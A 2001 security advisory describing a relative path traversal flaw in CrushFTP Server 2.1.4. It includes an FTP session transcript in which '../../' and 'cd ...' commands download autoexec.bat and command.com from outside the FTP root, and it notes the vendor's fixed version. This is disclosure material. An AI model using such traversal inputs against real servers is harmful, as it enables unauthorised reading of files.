Crush FTP Relative Path Vulnerability

Reported May 3, 2001, by Joe Testa.

VERSIONS AFFECTED

·         CrushFTP Server 2.1.4 for Windows 2000, Windows NT, Windows Me, and Windows 9x

 

DESCRIPTION

A vulnerability exists that lets an attacker break out of an FTP root. For example, by connecting to a vulnerable host and issuing the change directory (CD) command, an attacker can access the root directory where the FTP server is running. An attacker can also use relative paths to download files outside of an FTP root.

 

DEMONSTRATION

 

Joe Testa also provided the following proof-of-concept scenario:

 

The following is an illustration of the problem.  An ftp root of

"c:\directory\directory" was used.

 

>ftp localhost

Connected to xxxxxxxxxx.rh.rit.edu.

220-Welcome to CrushFTP!

220 CrushFTP Server Ready.

User (xxxxxxxxxx.rh.rit.edu:(none)): jdog

331 Username OK.  Need password.

Password:

230-Welcome!

230 Password OK.  Connected.

ftp> get ../../autoexec.bat

200 PORT command successful. 127.0.0.1:1868

150 Opening ASCII mode data connection for ../../autoexec.bat (419 bytes).

226-Download File Size:419 bytes @ 0K/sec.

226 Transfer complete.

ftp: 419 bytes received in 0.00Seconds 419000.00Kbytes/sec.

ftp> cd ...

250 "/.../" CWD command successful.

ftp> get command.com

200 PORT command successful. 127.0.0.1:1870

150 Opening ASCII mode data connection for command.com (93890 bytes).

226-Download File Size:93890 bytes @ 92K/sec.

226 Transfer complete.

ftp: 94570 bytes received in 1.86Seconds 50.84Kbytes/sec.

 

VENDOR RESPONSE

 

The program author, Ben Spink, has released version 2.1.7, which is not subject to this vulnerability.

 

CREDIT

Discovered by Joe Testa.

TAGS: Security
Hide comments

Comments

  • Allowed HTML tags: <em> <strong> <blockquote> <br> <p>

Plain text

  • No HTML tags allowed.
  • Web page addresses and e-mail addresses turn into links automatically.
  • Lines and paragraphs break automatically.
Publish